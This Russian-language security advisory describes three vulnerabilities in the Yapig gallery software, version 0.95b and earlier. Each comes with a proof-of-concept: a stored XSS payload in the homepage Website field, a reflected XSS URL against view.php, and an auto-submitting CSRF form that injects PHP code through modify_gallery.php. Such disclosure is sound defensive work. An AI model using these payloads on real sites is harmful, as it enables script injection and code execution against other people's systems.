Программа: Yapig 0.95b и более ранние версии
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей, а также выполнить произвольный PHP сценарий на системе.
1. Уязвимость существует из-за недостаточной обработки входных данных в поле Website формы Homepage.
Пример:
"><script>alert('hi')</script>
2. Уязвимость существует при обработке параметра img_size в сценарии view.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Для успешной эксплуатации уязвимости должна быть включена опция register_globals.
Пример:
http://your-server/path-to-yapig/view.php?gid=1& phid=1&img_size=><script>alert('hi')</script>
3. Удаленный пользователь может c помощью специально сформированной формы внедрить и выполнить произвольный PHP сценарий на целевой системе. Для удачной эксплуатации уязвимости требуется участие пользователя с административными привилегиями в приложении.
Пример:
<form method="post" action="http://your-server/path-to-yapig/ yapig095b/modify_gallery.php?action=
mod_info&gid=1">
<input value='TestGallery"; echo "evil' name="title" type="text">
<input value="TestAuthor" name="author" type="text">
<input value="TestDate" name="date" type="text">
<input value="" name="dir" type="text">
<input value="TestDescription" name="desc" type="text">
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>